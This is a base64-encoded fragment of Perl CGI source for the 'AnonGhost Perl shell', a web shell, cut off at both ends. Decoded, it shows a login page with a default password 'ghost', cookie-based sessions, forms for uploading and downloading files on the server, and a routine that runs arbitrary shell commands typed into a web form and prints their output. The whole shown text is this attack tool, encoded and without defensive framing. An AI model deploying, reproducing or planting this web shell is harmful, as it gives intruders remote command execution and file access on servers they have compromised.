JfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcg0KIyBBcmd1bWVudCAxOiBGb3JtIGl0ZW0gbmFtZSB0byB3aGljaCBmb2N1cyBzaG91bGQgYmUgc2V0DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlSGVhZGVyDQp7DQoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7DQoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsNCglwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCglwcmludCA8PEVORDsNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+QW5vbkdob3N0IFBlcmwgc2hlbGw8L3RpdGxlPg0KJEh0bWxNZXRhSGVhZGVyDQoNCjxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSJBbm9uR2hvc3QsQW5vbkdob3N0LEFub25HaG9zdC5pbmZvLGhhY2tlciI+DQo8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0iQW5vbkdob3N0LEFub25HaG9zdCxBbm9uR2hvc3QuaW5mbyxoYWNrZXIiPg0KPC9oZWFkPg0KPGJvZHkgb25Mb2FkPSJkb2N1bWVudC5mLkBfLmZvY3VzKCkiIGJnY29sb3I9IiNGRkZGRkYiIHRvcG1hcmdpbj0iMCIgbGVmdG1hcmdpbj0iMCIgbWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCIgdGV4dD0iI0ZGMDAwMCI+DQo8dGFibGUgYm9yZGVyPSIxIiB3aWR0aD0iMTAwJSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIj4NCjx0cj4NCjx0ZCBiZ2NvbG9yPSIjRkZGRkZGIiBib3JkZXJjb2xvcj0iI0ZGRkZGRiIgYWxpZ249ImNlbnRlciIgd2lkdGg9IjElIj4NCjxiPjxmb250IHNpemU9IjIiPiM8L2ZvbnQ+PC9iPjwvdGQ+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgd2lkdGg9Ijk4JSI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+PGI+IA0KPGIgc3R5bGU9ImNvbG9yOmJsYWNrO2JhY2tncm91bmQtY29sb3I6I2ZmZmY2NiI+QW5vbkdob3N0IFBlcmwgc2hlbGw8L2I+IENvbm5lY3RlZCB0byAkU2VydmVyTmFtZTwvYj48L2ZvbnQ+PC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQgY29sc3Bhbj0iMiIgYmdjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+DQoNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPXVwbG9hZCZkPSRFbmNvZGVkQ3VycmVudERpciI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlVwbG9hZCBGaWxlPC9mb250PjwvYT4gfCANCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+RG93bmxvYWQgRmlsZTwvZm9udD48L2E+IHwNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWxvZ291dCI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkRpc2Nvbm5lY3Q8L2ZvbnQ+PC9hPiB8DQo8L2ZvbnQ+PC90ZD4NCjwvdHI+DQo8L3RhYmxlPg0KPGZvbnQgc2l6ZT0iMyI+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5TY3JlZW4NCnsNCgkkTWVzc2FnZSA9IHEkPHByZT48aW1nIGJvcmRlcj0iMCIgc3JjPSJodHRwOi8vaW1nODEwLmltYWdlc2hhY2sudXMvaW1nODEwLzgwNDMvQW5vbkdob3N0MTIucG5nIj48L3ByZT48YnI+PGJyPjwvZm9udD48aDE+RGVmYXVsdCBQYXNzd29yZD1naG9zdDwvaDE+DQokOw0KIycNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQpUcnlpbmcgJFNlcnZlck5hbWUuLi48YnI+DQpDb25uZWN0ZWQgdG8gJFNlcnZlck5hbWU8YnI+DQpFc2NhcGUgY2hhcmFjdGVyIGlzIF5dDQo8Y29kZT4kTWVzc2FnZQ0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5GYWlsZWRNZXNzYWdlDQp7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxicj5sb2dpbjogYWRtaW48YnI+DQpwYXNzd29yZDo8YnI+DQpMb2dpbiBpbmNvcnJlY3Q8YnI+PGJyPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gZm9yIGxvZ2dpbmcgaW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ2luRm9ybQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImxvZ2luIj4NCjwvZm9udD4NCjxmb250IHNpemU9IjMiPg0KbG9naW46IDxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOiNmZmZmNjYiPkFub25HaG9zdCBQZXJsIHNoZWxsPC9iPjxicj4NCnBhc3N3b3JkOjwvZm9udD48Zm9udCBjb2xvcj0iIzAwOTkwMCIgc2l6ZT0iMyI+PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFbnRlciI+DQo8L2Zvcm0+DQo8L2NvZGU+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIGZvb3RlciBmb3IgdGhlIEhUTUwgUGFnZQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUZvb3Rlcg0Kew0KCXByaW50ICI8L2ZvbnQ+PC9ib2R5PjwvaHRtbD4iOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFJldHJlaXZlcyB0aGUgdmFsdWVzIG9mIGFsbCBjb29raWVzLiBUaGUgY29va2llcyBjYW4gYmUgYWNjZXNzZXMgdXNpbmcgdGhlDQojIHZhcmlhYmxlICRDb29raWVzeycnfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEdldENvb2tpZXMNCnsNCglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOw0KCWZvcmVhY2ggJGNvb2tpZShAaHR0cGNvb2tpZXMpDQoJew0KCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7DQoJCSRDb29raWVzeyRpZH0gPSAkdmFsOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dvdXRTY3JlZW4NCnsNCglwcmludCAiPGNvZGU+Q29ubmVjdGlvbiBjbG9zZWQgYnkgZm9yZWlnbiBob3N0Ljxicj48YnI+PC9jb2RlPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTG9ncyBvdXQgdGhlIHVzZXIgYW5kIGFsbG93cyB0aGUgdXNlciB0byBsb2dpbiBhZ2Fpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBlcmZvcm1Mb2dvdXQNCnsNCglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llDQoJJlByaW50UGFnZUhlYWRlcigicCIpOw0KCSZQcmludExvZ291dFNjcmVlbjsNCg0KCSZQcmludExvZ2luU2NyZWVuOw0KCSZQcmludExvZ2luRm9ybTsNCgkmUHJpbnRQYWdlRm9vdGVyOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGxvZ2luIHRoZSB1c2VyLiBJZiB0aGUgcGFzc3dvcmQgbWF0Y2hlcywgaXQNCiMgZGlzcGxheXMgYSBwYWdlIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHJ1biBjb21tYW5kcy4gSWYgdGhlIHBhc3N3b3JkIGRvZW5zJ3QNCiMgbWF0Y2ggb3IgaWYgbm8gcGFzc3dvcmQgaXMgZW50ZXJlZCwgaXQgZGlzcGxheXMgYSBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyDQojIHRvIGxvZ2luDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ2luIA0Kew0KCWlmKCRMb2dpblBhc3N3b3JkIGVxICRQYXNzd29yZCkgIyBwYXNzd29yZCBtYXRjaGVkDQoJew0KCQlwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9JExvZ2luUGFzc3dvcmQ7XG4iOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCgllbHNlICMgcGFzc3dvcmQgZGlkbid0IG1hdGNoDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJCSZQcmludExvZ2luU2NyZWVuOw0KCQlpZigkTG9naW5QYXNzd29yZCBuZSAiIikgIyBzb21lIHBhc3N3b3JkIHdhcyBlbnRlcmVkDQoJCXsNCgkJCSZQcmludExvZ2luRmFpbGVkTWVzc2FnZTsNCg0KCQl9DQoJCSZQcmludExvZ2luRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gZW50ZXIgY29tbWFuZHMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtDQp7DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImNvbW1hbmQiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCiRQcm9tcHQNCjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjIj4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFbnRlciI+DQo8L2Zvcm0+DQo8L2NvZGU+DQoNCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlRG93bmxvYWRGb3JtDQp7DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+DQokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+DQpEb3dubG9hZDogPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1lPSJmIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCiRQcm9tcHQgdXBsb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+DQpPcHRpb25zOiAmbmJzcDs8aW5wdXQgdHlwZT0iY2hlY2tib3giIG5hbWU9Im8iIHZhbHVlPSJvdmVyd3JpdGUiPg0KT3ZlcndyaXRlIGlmIGl0IEV4aXN0czxicj48YnI+DQpVcGxvYWQ6Jm5ic3A7Jm5ic3A7Jm5ic3A7PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0idXBsb2FkIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHRpbWVvdXQgZm9yIGEgY29tbWFuZCBleHBpcmVzLiBXZSBuZWVkIHRvDQojIHRlcm1pbmF0ZSB0aGUgc2NyaXB0IGltbWVkaWF0ZWx5LiBUaGlzIGZ1bmN0aW9uIGlzIHZhbGlkIG9ubHkgb24gVW5peC4gSXQgaXMNCiMgbmV2ZXIgY2FsbGVkIHdoZW4gdGhlIHNjcmlwdCBpcyBydW5uaW5nIG9uIE5ULg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIENvbW1hbmRUaW1lb3V0DQp7DQoJaWYoISRXaW5OVCkNCgl7DQoJCWFsYXJtKDApOw0KCQlwcmludCA8PEVORDsNCjwveG1wPg0KDQo8Y29kZT4NCkNvbW1hbmQgZXhjZWVkZWQgbWF4aW11bSB0aW1lIG9mICRDb21tYW5kVGltZW91dER1cmF0aW9uIHNlY29uZChzKS4NCjxicj5LaWxsZWQgaXQhDQpFTkQNCgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJCWV4aXQ7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlDQojIGNvbW1hbmQgYW5kIGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBhbm90aGVyIGNvbW1hbmQuIFRoZSBjaGFuZ2UgZGlyZWN0b3J5DQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4NCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQ0KIyBvdXRwdXQgb2YgdGhlIGNoYW5nZSBkaXJlY3RvcnkgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkIHRvIHRoZSB1c2Vycw0KIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBFeGVjdXRlQ29tbWFuZA0Kew0KCWlmKCRSdW5Db21tYW5kID1+IG0vXlxzKmNkXHMrKC4rKS8pICMgaXQgaXMgYSBjaGFuZ2UgZGlyIGNvbW1hbmQNCgl7DQoJCSMgd2UgY2hhbmdlIHRoZSBkaXJlY3RvcnkgaW50ZXJuYWxseS4gVGhlIG91dHB1dCBvZiB0aGUNCgkJIyBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQuDQoJCQ0KCQkkT2xkRGlyID0gJEN1cnJlbnREaXI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4iY2QgJDEiLiRDbWRTZXAuJENtZFB3ZDsNCgkJY2hvcCgkQ3VycmVudERpciA9IGAkQ29tbWFuZGApOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCSRQcm9tcHQgPSAkV2luTlQgPyAiJE9sZERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRPbGREaXJdXCQgIjsNCgkJcHJpbnQgIiRQcm9tcHQgJFJ1bkNvbW1hbmQiOw0KCX0NCgllbHNlICMgc29tZSBvdGhlciBjb21tYW5kLCBkaXNwbGF5IHRoZSBvdXRwdXQNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJCXByaW50ICIkUHJvbXB0ICRSdW5Db21tYW5kPHhtcD4iOw0KCQkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7DQoJCWlmKCEkV2luTlQpDQoJCXsNCgkJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7DQoJCQlhbGFybSgkQ29tbWFuZFRpbWVvdXREdXJhdGlvbik7DQoJCX0NCgkJaWYoJFNob3dEeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZA0KCQl7DQoJCQkkfD0xOw0KCQkJJENvbW1hbmQgLj0gIiB8IjsNCgkJCW9wZW4oQ29tbWFuZE91dHB1dCwgJENvbW1hbmQpOw0KCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQ0KCQkJew0KCQkJCSRfID1+IHMvKFxufFxyXG4pJC8vOw0KCQkJCXByaW50ICIkX1xuIjsNCgkJCX0NCgkJCSR8PTA7DQoJCX0NCgkJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzDQoJCXsNCgkJCXByaW50IGAkQ29tbWFuZGA7DQoJCX0NCgkJaWYoISRXaW5OVCkNCgkJew0KCQkJYWxhcm0oMCk7DQoJCX0NCgkJcHJpbnQgIjwveG1wPiI7DQoJfQ0KCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBkaXNwbGF5cyB0aGUgcGFnZSB0aGF0IGNvbnRhaW5zIGEgbGluayB3aGljaCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gZG93bmxvYWQgdGhlIHNwZWNpZmllZCBmaWxlLiBUaGUgcGFnZSBhbHNvIGNvbnRhaW5zIGEgYXV0by1yZWZyZXNoDQojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBmaWxlbmFtZSBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlDQp7DQoJbG9jYWwoJEZpbGVVcmwpID0gQF87DQoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzDQoJew0KCQkjIGVuY29kZSB0aGUgZmlsZSBsaW5rIHNvIHdlIGNhbiBzZW5kIGl0IHRvIHRoZSBicm93c2VyDQoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsNCgkJJERvd25sb2FkTGluayA9ICIkU2NyaXB0TG9jYXRpb24/YT1kb3dubG9hZCZmPSRGaWxlVXJsJm89Z28iOw0KCQkkSHRtbE1ldGFIZWFkZXIgPSAiPG1ldGEgSFRUUC1FUVVJVj1cIlJlZnJlc2hcIiBDT05URU5UPVwiMTsgVVJMPSREb3dubG9hZExpbmtcIj4iOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNClNlbmRpbmcgRmlsZSAkVHJhbnNmZXJGaWxlLi4uPGJyPg0KSWYgdGhlIGRvd25sb2FkIGRvZXMgbm90IHN0YXJ0IGF1dG9tYXRpY2FsbHksDQo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPi4NCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQoJZWxzZSAjIGZpbGUgZG9lc24ndCBleGlzdA0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiZiIpOw0KCQlwcmludCAiRmFpbGVkIHRvIGRvd25sb2FkICRGaWxlVXJsOiAkISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gcmVhZHMgdGhlIHNwZWNpZmllZCBmaWxlIGZyb20gdGhlIGRpc2sgYW5kIHNlbmRzIGl0IHRvIHRoZQ0KIyBicm93c2VyLCBzbyB0aGF0IGl0IGNhbiBiZSBkb3dubG9hZGVkIGJ5IHRoZSB1c2VyLg0KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBTZW5kRmlsZVRvQnJvd3Nlcg0Kew0KCWxvY2FsKCRTZW5kRmlsZSkgPSBAXzsNCglpZihvcGVuKFNFTkRGSUxFLCAkU2VuZEZpbGUpKSAjIGZpbGUgb3BlbmVkI